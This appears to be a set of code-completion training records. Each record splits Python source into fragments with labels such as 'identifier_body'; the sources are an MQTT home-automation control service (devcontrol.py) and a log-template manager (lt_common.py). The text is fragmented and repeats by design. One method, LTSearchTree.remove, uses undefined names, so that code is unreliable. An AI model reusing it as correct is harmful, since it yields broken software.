# "command name": (expected_nargs, delegate)
"add": (4, device.add),
# add <guestname> <displayname> <type> <status>
# add a device to the network
"rename": (2, device.rename),
# rename <displayname> <newdisplayname>
# change the public display name of a device in the network
"del": (1, device.delete),
# del <displayname>
# delete a device from the network
"sync": (1, device.sync),
# sync <displayname>
# send a time synchronization message to the specified device
"ping": (1, device.ping),
# ping <displayname>
# check a device is still responsive by sending a ping message
"askstatus": (1, device.askstatus),
# askstatus <displayname>
# ask the device for its current status
"cmd": (2, device.execute),
# cmd <displayname> <operation>
# send immediate command to device;
# arguments to the operation should be within the operation argument, e.g. 'dimmer 126'
# the operation must be valid (and have valid arguments) for the device type;
# otherwise, the command will fail silently
"timed": (5, timed_handler),
# timed (add|del) <displayname> <date> (exact|fuzzy) <operation>
# schedule a command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <date> must be formatted as a unix integer timestamp in the future,
# otherwise the command is a no-op;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message;
"recurrent": (7, recurrent_handler),
# recurrent (add|del) <displayname> <weekday> <hours> <minutes> (exact|fuzzy) <operation>
# schedule a recurrent command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <weekday> must be a number between 0 and 9. Passing 0 signals the operation should execute
# every day; 1-7 signal it should be executed on Mon-Sun respectively; 8 signals Mon-Fri; and
# 9 signals Sat-Sun;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message
"clear": (1, device.clearschedule),
# clear <displayname>
# clear the schedule for a given device
"devlist": (0, devlist_handler),
# devlist
# retrieve verified device list
# respond with a list of devices, using the format: ('(-|+)<displayname>' )*
# where every name is prepended with a positive sign '+' if the device is connected
# and a negative sign '-' if it is not
"guestlist": (0, guestlist_handler),
# guestlist
# retrieve the guestlist
# respond with a list of unverified devices, using the format ('<displayname>' )*
# note that every guest is connected (otherwise it would just be removed from the list)
"info": (1, info_handler),
# info <displayname>
# retrieve device profile
# respond with the list of device properties in the profile using the format
# <connected><type> <status>
# where connected is formatted as + if the device is connected as - if it is not, e.g.
# '-sonoff on' indicates a disconnected sonoff device with a status of 'on'
"schedule": (1, schedule_handler)
# schedule <displayname>
# retrieve device schedule
# respond with a list of scheduled commands for the given device using the formats
# timed <date> (exact|fuzzy) <operation> <args>
# recurrent <weekday> <hours> <minutes> (exact|fuzzy) <operation> [<args>]
# for timed and recurrent operations respectively;
# the specifics of each formats are the same as for their schedule counterparts
}
try:
(expected_nargs, delegate) = commands[cmd]
except KeyError:
print("Unrecognized command, skipping", file=sys.stderr)
return
processcmd(cmd, args, expected_nargs, delegate)
def genconfig(infilename, definitions, outfilename):
"""Generate an appropriate Mosquitto configuration file."""
with open(infilename, "r") as infile:
text = infile.read()
template = string.Template(text)
text = template.safe_substitute(definitions)
with open(outfilename, "w") as outfile:
outfile.write(text)
def loop(mosquitto, configuration, db, cursor, guestlist, logger):
"""Main MQTT/REST API event loop."""
userdata = {"done": False, "database": db, "cursor": cursor,
"configuration": configuration, "client": None, "guestlist": guestlist}
client = None
try:
client = mqtt.Client(userdata=userdata)
client.username_pw_set(configuration["superuser"], configuration["superpass"])
client.on_connect = mqtthandlers.onconnect
client.on_disconnect = mqtthandlers.ondisconnect
client.on_message = mqtthandlers.onmessage
userdata["client"] = client
client.tls_set(configuration["certificate"])
client.connect(configuration["devhostname"], configuration["devmqttport"], keepalive=300)
mqttsocket = client.socket()
print("AutoHome public interface started", file=sys.stderr)
while not userdata["done"]:
try:
# timeout is set to a value lesser than the keepalive period, otherwise
# loop_misc() may not be called on time and the server can close the connection
available = select.select([sys.stdin, mqttsocket, mosquitto.stderr], [], [], 30)
if mqttsocket in available[0]:
client.loop_read()
if sys.stdin in available[0]:
try:
processline(userdata, input())
db.commit()
except FormatError as e:
print("Error processing line: " + str(e), file=sys.stderr)
except EOFError:
userdata["done"] = True
if client.want_write():
client.loop_write()
client.loop_misc()
if mosquitto.stderr in available[0]:
line = mosquitto.stderr.readline()
logger.debug(line.strip().decode("utf8"))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
print("Unexpected exception", file=sys.stderr)
print(e, file=sys.stderr)
traceback.print_tb(e.__traceback__, file=sys.stderr)
time.sleep(10) # instead of crashing and losing everything, try to continue;
# if the problem was transient, the error is logged and the
# system is still available; if the problem is fatal,
# wait so as to not generate infinite logfiles with
# succesive exceptions, e.g. because the sql database has
# been corrupted and every attempt to access it fails
finally:
client.disconnect()
def main():
"""Program entry point."""
setsignals()
configuration = None
guestlist = set()
configfilename = sys.argv[1] if len(sys.argv) > 1 else "configuration.json"
guestlist.add("pipe")
scriptdir = os.path.dirname(os.path.realpath(__file__))
try:
with open(configfilename) as configfile:
configuration = json.loads(configfile.read())
except IOError:
print("Can't open configuration file", file=sys.stderr)
return
# the relative path is necessary for the mosquitto configuration file
# the join adds a trailing os-specific dir separator
configuration["relpath"] = os.path.join(os.path.relpath("./", scriptdir), "")
with sqlite3.connect(configuration["devdbfile"]) as db:
cursor = db.cursor()
try:
database.setupdb(cursor)
database.setsuperuser(cursor, configuration["superuser"], configuration["superpass"])
except KeyError:
print("Incomplete configuration file", file=sys.stderr)
return
except sqlite3.Error:
print("Can't set up the database and super user", file=sys.stderr)
return
db.commit()
genconfig(os.path.join(scriptdir, "mosquitto.conf.in"), configuration,
os.path.join(scriptdir, "mosquitto.conf"))
with subprocess.Popen(["mosquitto", "-c", os.path.join(scriptdir, "mosquitto.conf")],
stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
stdin=subprocess.DEVNULL, cwd=scriptdir) as mosquitto:
time.sleep(0.5) # let mosquitto broker start up
handler = None
try:
logger = logging.getLogger(__name__)
handler = logging.handlers.RotatingFileHandler(os.path.join(scriptdir, "mosquitto.log"),
"a", 1024 * 1024, 10)
handler.setFormatter(logging.Formatter())
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
print("MQTT broker started", file=sys.stderr)
loop(mosquitto, configuration, db, cursor, guestlist, logger)
finally:
mosquitto.terminate()
if handler is not None:
remaining = mosquitto.stderr.read()
logger.debug(remaining.strip().decode("utf8"))
handler.close()
if __name__ == "__main__":
| main() | conditional_block |
|
devcontrol.py | # devcontrol.py
# Home automation device control service
#
# Part of AutoHome
#
# Copyright (c) 2017, Diego Guerrero
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of its contributors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Home automation device control service."""
import sqlite3
import os, sys, signal, subprocess
import json
import time
import select
import shlex
import logging, logging.handlers
import string
import traceback
import paho.mqtt.client as mqtt
from Event import Event
import database
import device
import mqtthandlers
# Exceptions
# ------------------------------------------------------------------------------
class FormatError(Exception):
"""Formatting error. An input string couldn't be parsed as it did not conform to its schema."""
pass
# Signals
# ------------------------------------------------------------------------------
def setsignals():
"""Set termination signals to gracefully close every resource."""
signal.signal(signal.SIGINT, gracefulexit)
signal.signal(signal.SIGTERM, gracefulexit)
signal.signal(signal.SIGHUP, gracefulexit)
def gracefulexit(signalnumber, frame):
"""Close the database, broker and client, and exit the program."""
sys.exit(0) # resources will be closed on their corresponding finally blocks
# Main routines
# ------------------------------------------------------------------------------
def | (userdata, line):
"""Read a line from stdin and execute the corresponding command."""
def processcmd(command, args, expected_nargs, delegate):
"""Validate the number of arguments and call a delegate handler."""
if len(args) != expected_nargs:
raise FormatError("Wrong number of arguments for '" + command + "', expected " +
str(expected_nargs) + " but got " + str(len(args)))
delegate(userdata, *args)
# commands should use double quotes if an argument has spaces
# in it and escape internal double quotes as necessary
tokens = shlex.split(line)
if len(tokens) < 1:
return
cmd = tokens[0]
args = tokens[1:]
# Specialized handlers; they bridge the user facing interface and the internal implementations;
# see the command dictionary below for more information on each operation
def timed_handler(userdata, *args):
"""Accomodate the input for a non-recurrent event."""
fuzzy = False
if args[3] == "exact":
fuzzy = False
elif args[3] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[3] + "' instead.")
event = Event.create_once(args[4], fuzzy, args[2])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def recurrent_handler(userdata, *args):
"""Accomodate the input for a recurrent event."""
fuzzy = False
if args[5] == "exact":
fuzzy = False
elif args[5] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[5] + "' instead.")
event = Event.create_recurrent(args[6], fuzzy, args[2], args[3], args[4])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def devlist_handler(userdata, *args):
"""Transform the raw devlist into a human readable list."""
for (dev, connected) in database.devlist(userdata["cursor"]):
if dev == "devmaster":
continue
if connected:
print(shlex.quote("+" + dev), end=" ")
else:
print(shlex.quote("-" + dev), end=" ")
print()
def guestlist_handler(userdata, *args):
"""Transform the raw guestlist into a human readable list."""
for guest in userdata["guestlist"]:
print(shlex.quote(guest), end=" ")
print()
def info_handler(userdata, *args):
"""Transform the raw info list into a human readable list."""
info = database.devinfo(userdata["cursor"], args[0])
if info is None:
print("can't find user " + args[0])
return
stype, connected, status = info
print(shlex.quote(("+" if connected else "-") + stype), end=" ")
print(shlex.quote(status))
def schedule_handler(userdata, *args):
"""Transform the raw schedule list into a human readable list."""
for event in database.devschedule(userdata["cursor"], args[0]):
print(str(event))
print("")
# Command dictionary
commands = {
# "command name": (expected_nargs, delegate)
"add": (4, device.add),
# add <guestname> <displayname> <type> <status>
# add a device to the network
"rename": (2, device.rename),
# rename <displayname> <newdisplayname>
# change the public display name of a device in the network
"del": (1, device.delete),
# del <displayname>
# delete a device from the network
"sync": (1, device.sync),
# sync <displayname>
# send a time synchronization message to the specified device
"ping": (1, device.ping),
# ping <displayname>
# check a device is still responsive by sending a ping message
"askstatus": (1, device.askstatus),
# askstatus <displayname>
# ask the device for its current status
"cmd": (2, device.execute),
# cmd <displayname> <operation>
# send immediate command to device;
# arguments to the operation should be within the operation argument, e.g. 'dimmer 126'
# the operation must be valid (and have valid arguments) for the device type;
# otherwise, the command will fail silently
"timed": (5, timed_handler),
# timed (add|del) <displayname> <date> (exact|fuzzy) <operation>
# schedule a command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <date> must be formatted as a unix integer timestamp in the future,
# otherwise the command is a no-op;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message;
"recurrent": (7, recurrent_handler),
# recurrent (add|del) <displayname> <weekday> <hours> <minutes> (exact|fuzzy) <operation>
# schedule a recurrent command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <weekday> must be a number between 0 and 9. Passing 0 signals the operation should execute
# every day; 1-7 signal it should be executed on Mon-Sun respectively; 8 signals Mon-Fri; and
# 9 signals Sat-Sun;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message
"clear": (1, device.clearschedule),
# clear <displayname>
# clear the schedule for a given device
"devlist": (0, devlist_handler),
# devlist
# retrieve verified device list
# respond with a list of devices, using the format: ('(-|+)<displayname>' )*
# where every name is prepended with a positive sign '+' if the device is connected
# and a negative sign '-' if it is not
"guestlist": (0, guestlist_handler),
# guestlist
# retrieve the guestlist
# respond with a list of unverified devices, using the format ('<displayname>' )*
# note that every guest is connected (otherwise it would just be removed from the list)
"info": (1, info_handler),
# info <displayname>
# retrieve device profile
# respond with the list of device properties in the profile using the format
# <connected><type> <status>
# where connected is formatted as + if the device is connected as - if it is not, e.g.
# '-sonoff on' indicates a disconnected sonoff device with a status of 'on'
"schedule": (1, schedule_handler)
# schedule <displayname>
# retrieve device schedule
# respond with a list of scheduled commands for the given device using the formats
# timed <date> (exact|fuzzy) <operation> <args>
# recurrent <weekday> <hours> <minutes> (exact|fuzzy) <operation> [<args>]
# for timed and recurrent operations respectively;
# the specifics of each formats are the same as for their schedule counterparts
}
try:
(expected_nargs, delegate) = commands[cmd]
except KeyError:
print("Unrecognized command, skipping", file=sys.stderr)
return
processcmd(cmd, args, expected_nargs, delegate)
def genconfig(infilename, definitions, outfilename):
"""Generate an appropriate Mosquitto configuration file."""
with open(infilename, "r") as infile:
text = infile.read()
template = string.Template(text)
text = template.safe_substitute(definitions)
with open(outfilename, "w") as outfile:
outfile.write(text)
def loop(mosquitto, configuration, db, cursor, guestlist, logger):
"""Main MQTT/REST API event loop."""
userdata = {"done": False, "database": db, "cursor": cursor,
"configuration": configuration, "client": None, "guestlist": guestlist}
client = None
try:
client = mqtt.Client(userdata=userdata)
client.username_pw_set(configuration["superuser"], configuration["superpass"])
client.on_connect = mqtthandlers.onconnect
client.on_disconnect = mqtthandlers.ondisconnect
client.on_message = mqtthandlers.onmessage
userdata["client"] = client
client.tls_set(configuration["certificate"])
client.connect(configuration["devhostname"], configuration["devmqttport"], keepalive=300)
mqttsocket = client.socket()
print("AutoHome public interface started", file=sys.stderr)
while not userdata["done"]:
try:
# timeout is set to a value lesser than the keepalive period, otherwise
# loop_misc() may not be called on time and the server can close the connection
available = select.select([sys.stdin, mqttsocket, mosquitto.stderr], [], [], 30)
if mqttsocket in available[0]:
client.loop_read()
if sys.stdin in available[0]:
try:
processline(userdata, input())
db.commit()
except FormatError as e:
print("Error processing line: " + str(e), file=sys.stderr)
except EOFError:
userdata["done"] = True
if client.want_write():
client.loop_write()
client.loop_misc()
if mosquitto.stderr in available[0]:
line = mosquitto.stderr.readline()
logger.debug(line.strip().decode("utf8"))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
print("Unexpected exception", file=sys.stderr)
print(e, file=sys.stderr)
traceback.print_tb(e.__traceback__, file=sys.stderr)
time.sleep(10) # instead of crashing and losing everything, try to continue;
# if the problem was transient, the error is logged and the
# system is still available; if the problem is fatal,
# wait so as to not generate infinite logfiles with
# succesive exceptions, e.g. because the sql database has
# been corrupted and every attempt to access it fails
finally:
client.disconnect()
def main():
"""Program entry point."""
setsignals()
configuration = None
guestlist = set()
configfilename = sys.argv[1] if len(sys.argv) > 1 else "configuration.json"
guestlist.add("pipe")
scriptdir = os.path.dirname(os.path.realpath(__file__))
try:
with open(configfilename) as configfile:
configuration = json.loads(configfile.read())
except IOError:
print("Can't open configuration file", file=sys.stderr)
return
# the relative path is necessary for the mosquitto configuration file
# the join adds a trailing os-specific dir separator
configuration["relpath"] = os.path.join(os.path.relpath("./", scriptdir), "")
with sqlite3.connect(configuration["devdbfile"]) as db:
cursor = db.cursor()
try:
database.setupdb(cursor)
database.setsuperuser(cursor, configuration["superuser"], configuration["superpass"])
except KeyError:
print("Incomplete configuration file", file=sys.stderr)
return
except sqlite3.Error:
print("Can't set up the database and super user", file=sys.stderr)
return
db.commit()
genconfig(os.path.join(scriptdir, "mosquitto.conf.in"), configuration,
os.path.join(scriptdir, "mosquitto.conf"))
with subprocess.Popen(["mosquitto", "-c", os.path.join(scriptdir, "mosquitto.conf")],
stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
stdin=subprocess.DEVNULL, cwd=scriptdir) as mosquitto:
time.sleep(0.5) # let mosquitto broker start up
handler = None
try:
logger = logging.getLogger(__name__)
handler = logging.handlers.RotatingFileHandler(os.path.join(scriptdir, "mosquitto.log"),
"a", 1024 * 1024, 10)
handler.setFormatter(logging.Formatter())
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
print("MQTT broker started", file=sys.stderr)
loop(mosquitto, configuration, db, cursor, guestlist, logger)
finally:
mosquitto.terminate()
if handler is not None:
remaining = mosquitto.stderr.read()
logger.debug(remaining.strip().decode("utf8"))
handler.close()
if __name__ == "__main__":
main()
| processline | identifier_name |
lt_common.py | #!/usr/bin/env python
# coding: utf-8
import os
import cPickle as pickle
class LTManager(object):
# adding lt to db (ltgen do not add)
def __init__(self, conf, db, table, reset_db, ltg_alg):
self.reset_db = reset_db
self.conf = conf
self.sym = conf.get("log_template", "variable_symbol")
self.filename = conf.get("log_template", "indata_filename")
self.db = db # log_db.LogDB
self.table = table # LTTable
self.ltgroup = self._init_ltgroup(ltg_alg) # LTGroup
if os.path.exists(self.filename) and not reset_db:
self.load()
def _init_ltgroup(self, ltg_alg):
if ltg_alg == "shiso":
import lt_shiso
ltgroup = lt_shiso.LTGroupSHISO(self.table,
ngram_length = self.conf.getint(
"log_template_shiso", "ltgroup_ngram_length"),
th_lookup = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_lookup"),
th_distance = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_distance"),
mem_ngram = self.conf.getboolean(
"log_template_shiso", "ltgroup_mem_ngram")
)
elif ltg_alg == "none":
ltgroup = LTGroup()
else:
raise ValueError("ltgroup_alg({0}) invalid".format(ltg_alg))
if not self.reset_db:
ltgroup.restore_ltg(self.db, self.table)
return ltgroup
def process_line(self, l_w, l_s):
# return ltline object
# if ltline is None, it means lt not found in pre-defined table
raise NotImplementedError
def add_lt(self, l_w, l_s, cnt = 1):
# add new lt to db and table
ltid = self.table.next_ltid()
ltline = LogTemplate(ltid, None, l_w, l_s, cnt, self.sym)
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.table.add_lt(ltline)
self.db.add_lt(ltline)
return ltline
def replace_lt(self, ltid, l_w, l_s = None, cnt = None):
self.table[ltid].replace(l_w, l_s, cnt)
self.db.update_lt(ltid, l_w, l_s, cnt)
def replace_and_count_lt(self, ltid, l_w, l_s = None):
cnt = self.table[ltid].count()
self.table[ltid].replace(l_w, l_s, None)
self.db.update_lt(ltid, l_w, l_s, cnt)
def count_lt(self, ltid):
cnt = self.table[ltid].count()
self.db.update_lt(ltid, None, None, cnt)
def remove_lt(self, ltid):
self.table.remove_lt(ltid)
self.db.remove_lt(ltid)
def remake_ltg(self):
self.db.reset_ltg()
self.ltgroup.init_dict()
temp_table = self.table
self.ltgroup.table = LTTable(self.sym)
for ltline in temp_table:
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.ltgroup.table.add_lt(ltline)
self.db.add_ltg(ltline.ltid, ltgid)
assert self.ltgroup.table.ltdict == temp_table.ltdict
def load(self):
pass
def dump(self):
pass
def _load_pickle(self):
with open(self.filename, 'r') as f:
return pickle.load(f)
def _dump_pickle(self, obj):
with open(self.filename, 'w') as f:
pickle.dump(obj, f)
class LTTable():
def __init__(self, sym):
self.ltdict = {}
self.sym = sym
def __iter__(self):
return self._generator()
def _generator(self):
for ltid in self.ltdict.keys():
yield self.ltdict[ltid]
def __len__(self):
return len(self.ltdict)
def __getitem__(self, key):
assert isinstance(key, int)
if not self.ltdict.has_key(key):
raise IndexError("list index out of range")
return self.ltdict[key]
def next_ltid(self):
cnt = 0
while self.ltdict.has_key(cnt):
cnt += 1
else:
return cnt
def restore_lt(self, ltid, ltgid, ltw, lts, count):
assert not self.ltdict.has_key(ltid)
self.ltdict[ltid] = LogTemplate(ltid, ltgid, ltw, lts, count, self.sym)
def add_lt(self, ltline):
assert not self.ltdict.has_key(ltline.ltid)
self.ltdict[ltline.ltid] = ltline
def remove_lt(self, ltid):
self.ltdict.pop(ltid)
class LogTemplate():
|
class LTGroup(object):
# usually used as super class of other ltgroup
# If used directly, this class will work as a dummy
# (ltgid is always same as ltid)
def __init__(self):
self.init_dict()
def init_dict(self):
self.d_group = {} # key : groupid, val : [ltline, ...]
self.d_rgroup = {} # key : ltid, val : groupid
def _next_groupid(self):
cnt = 0
while self.d_group.has_key(cnt):
cnt += 1
else:
return cnt
def add(self, ltline):
gid = ltline.ltid
self.add_ltid(gid, ltline)
return gid
def add_ltid(self, gid, ltline):
self.d_group.setdefault(gid, []).append(ltline)
self.d_rgroup[ltline.ltid] = gid
def restore_ltg(self, db, table):
for ltid, ltgid in db.iter_ltg_def():
self.d_group.setdefault(ltgid, []).append(table[ltid])
self.d_rgroup[ltid] = ltgid
class LTSearchTree():
# Search tree for un-incremental lt generation algorithms
def __init__(self, sym):
self.sym = sym
self.root = self._new_node()
def __str__(self):
l_buf = []
def print_children(point, depth):
word = point.word
if word is None: word = "**"
buf = "-" * depth + " {0}".format(point.word)
if point.end is not None:
buf += " <-- ltid {0}".format(point.end)
l_buf.append(buf)
for word in point.windex.keys():
print_children(point.windex[word], depth + 1)
if point.wild is not None:
print_children(point.wild, depth + 1)
point = self.root
l_buf.append("<head of log template search tree>")
for word in point.windex.keys():
print_children(point.windex[word], 1)
if point.wild is not None:
print_children(point.wild, 1)
return "\n".join(l_buf)
@staticmethod
def _new_node(parent = None, word = None):
return LTSearchTreeNode(parent, word)
def add(self, ltid, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
point.wild = self._new_node(point, w)
point = point.wild
else:
if not point.windex.has_key(w):
point.windex[w] = self._new_node(point, w)
point = point.windex[w]
else:
point.set_ltid(ltid)
def _trace(self, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
return None
else:
point = point.wild
elif point.windex.has_key(w):
point = point.windex[w]
elif point.wild is not None:
point = point.wild
else:
return None
else:
return point
def remove(self, ltid, ltwords):
node = self._trace(ltwords)
if node is None:
_logger.warning(
"LTSearchTree : Failed to remove ltid {0}".format(ltid))
point.remove_ltid(ltid)
while point.unnecessary():
w = point.word
point = point.parent
if w is None:
point.wild = None
else:
point.wdict.pop(w)
else:
if self.root is None:
self.root = self._new_node()
def search(self, ltwords):
node = self._trace(ltwords)
if node is None:
return None
else:
return node.get_ltid()
class LTSearchTreeNode():
def __init__(self, parent, word):
self.windex = {}
self.wild = None
self.end = None
self.parent = parent # for reverse search to remove
self.word = word
def child(self, word = None):
if word is None:
# wildcard
return self.wild
elif self.windex.has_key(word):
return self.windex[word]
else:
return None
def set_ltid(self, ltid):
self.end = ltid
def remove_ltid(self, ltid):
assert self.end == ltid
self.end = None
def get_ltid(self):
return self.end
def unnecessary(self):
return (len(self.windex) == 0) and \
(self.wild is None) and \
(self.end is None)
def merge_lt(m1, m2, sym):
#return common area of log message (to be log template)
ret = []
for w1, w2 in zip(m1, m2):
if w1 == w2:
ret.append(w1)
else:
ret.append(sym)
return ret
| def __init__(self, ltid, ltgid, ltw, lts, count, sym):
self.ltid = ltid
self.ltgid = ltgid
self.ltw = ltw
self.lts = lts
self.cnt = count
self.sym = sym
def __str__(self):
return self.restore_message(self.ltw)
def var(self, l_w):
return [w_org for w_org, w_lt in zip(l_w, self.ltw)
if w_lt == self.sym]
def var_location(self):
return [i for i, w_lt in enumerate(self.ltw) if w_lt == self.sym]
def restore_message(self, l_w):
if self.lts is None:
return "".join(l_w)
else:
return "".join([s + w for w, s in zip(l_w + [""], self.lts)])
def count(self):
self.cnt += 1
return self.cnt
def replace(self, l_w, l_s = None, count = None):
self.ltw = l_w
if l_s is not None:
self.lts = l_s
if count is not None:
self.cnt = count | identifier_body |
lt_common.py | #!/usr/bin/env python
# coding: utf-8
import os
import cPickle as pickle
class LTManager(object):
# adding lt to db (ltgen do not add)
def __init__(self, conf, db, table, reset_db, ltg_alg):
self.reset_db = reset_db
self.conf = conf
self.sym = conf.get("log_template", "variable_symbol")
self.filename = conf.get("log_template", "indata_filename")
self.db = db # log_db.LogDB
self.table = table # LTTable
self.ltgroup = self._init_ltgroup(ltg_alg) # LTGroup
if os.path.exists(self.filename) and not reset_db:
self.load()
def _init_ltgroup(self, ltg_alg):
if ltg_alg == "shiso":
import lt_shiso
ltgroup = lt_shiso.LTGroupSHISO(self.table,
ngram_length = self.conf.getint(
"log_template_shiso", "ltgroup_ngram_length"),
th_lookup = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_lookup"),
th_distance = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_distance"),
mem_ngram = self.conf.getboolean(
"log_template_shiso", "ltgroup_mem_ngram")
)
elif ltg_alg == "none":
ltgroup = LTGroup()
else:
raise ValueError("ltgroup_alg({0}) invalid".format(ltg_alg))
if not self.reset_db:
ltgroup.restore_ltg(self.db, self.table)
return ltgroup
def process_line(self, l_w, l_s):
# return ltline object
# if ltline is None, it means lt not found in pre-defined table
raise NotImplementedError
def add_lt(self, l_w, l_s, cnt = 1):
# add new lt to db and table
ltid = self.table.next_ltid()
ltline = LogTemplate(ltid, None, l_w, l_s, cnt, self.sym)
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.table.add_lt(ltline)
self.db.add_lt(ltline)
return ltline
def replace_lt(self, ltid, l_w, l_s = None, cnt = None):
self.table[ltid].replace(l_w, l_s, cnt)
self.db.update_lt(ltid, l_w, l_s, cnt)
def replace_and_count_lt(self, ltid, l_w, l_s = None):
cnt = self.table[ltid].count()
self.table[ltid].replace(l_w, l_s, None)
self.db.update_lt(ltid, l_w, l_s, cnt)
def count_lt(self, ltid):
cnt = self.table[ltid].count()
self.db.update_lt(ltid, None, None, cnt)
def remove_lt(self, ltid):
self.table.remove_lt(ltid)
self.db.remove_lt(ltid)
def remake_ltg(self):
self.db.reset_ltg()
self.ltgroup.init_dict()
temp_table = self.table
self.ltgroup.table = LTTable(self.sym)
for ltline in temp_table:
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.ltgroup.table.add_lt(ltline)
self.db.add_ltg(ltline.ltid, ltgid)
assert self.ltgroup.table.ltdict == temp_table.ltdict
def load(self):
pass
def dump(self):
pass
def _load_pickle(self):
with open(self.filename, 'r') as f:
return pickle.load(f)
def _dump_pickle(self, obj):
with open(self.filename, 'w') as f:
pickle.dump(obj, f)
class LTTable():
def __init__(self, sym):
self.ltdict = {}
self.sym = sym
def __iter__(self):
return self._generator()
def _generator(self):
for ltid in self.ltdict.keys():
yield self.ltdict[ltid]
def __len__(self):
return len(self.ltdict)
def __getitem__(self, key):
assert isinstance(key, int)
if not self.ltdict.has_key(key):
raise IndexError("list index out of range")
return self.ltdict[key]
def next_ltid(self):
cnt = 0
while self.ltdict.has_key(cnt):
cnt += 1
else:
return cnt
def restore_lt(self, ltid, ltgid, ltw, lts, count):
assert not self.ltdict.has_key(ltid)
self.ltdict[ltid] = LogTemplate(ltid, ltgid, ltw, lts, count, self.sym)
def add_lt(self, ltline):
assert not self.ltdict.has_key(ltline.ltid)
self.ltdict[ltline.ltid] = ltline
def remove_lt(self, ltid):
self.ltdict.pop(ltid)
class LogTemplate():
def __init__(self, ltid, ltgid, ltw, lts, count, sym):
self.ltid = ltid
self.ltgid = ltgid
self.ltw = ltw
self.lts = lts
self.cnt = count
self.sym = sym
def __str__(self):
return self.restore_message(self.ltw)
def var(self, l_w):
return [w_org for w_org, w_lt in zip(l_w, self.ltw)
if w_lt == self.sym]
def var_location(self):
return [i for i, w_lt in enumerate(self.ltw) if w_lt == self.sym]
def restore_message(self, l_w):
if self.lts is None:
return "".join(l_w)
else:
return "".join([s + w for w, s in zip(l_w + [""], self.lts)])
def count(self):
self.cnt += 1
return self.cnt
def replace(self, l_w, l_s = None, count = None):
self.ltw = l_w
if l_s is not None:
self.lts = l_s
if count is not None:
self.cnt = count
class LTGroup(object):
# usually used as super class of other ltgroup
# If used directly, this class will work as a dummy
# (ltgid is always same as ltid)
def __init__(self):
self.init_dict()
def init_dict(self):
self.d_group = {} # key : groupid, val : [ltline, ...]
self.d_rgroup = {} # key : ltid, val : groupid
def _next_groupid(self):
cnt = 0
while self.d_group.has_key(cnt):
cnt += 1
else:
return cnt
def add(self, ltline):
gid = ltline.ltid
self.add_ltid(gid, ltline)
return gid
def add_ltid(self, gid, ltline):
self.d_group.setdefault(gid, []).append(ltline)
self.d_rgroup[ltline.ltid] = gid
def restore_ltg(self, db, table):
for ltid, ltgid in db.iter_ltg_def():
self.d_group.setdefault(ltgid, []).append(table[ltid])
self.d_rgroup[ltid] = ltgid
class LTSearchTree():
# Search tree for un-incremental lt generation algorithms
def __init__(self, sym):
self.sym = sym
self.root = self._new_node()
def __str__(self):
l_buf = []
def print_children(point, depth):
word = point.word
if word is None: word = "**"
buf = "-" * depth + " {0}".format(point.word)
if point.end is not None:
buf += " <-- ltid {0}".format(point.end)
l_buf.append(buf)
for word in point.windex.keys():
print_children(point.windex[word], depth + 1)
if point.wild is not None:
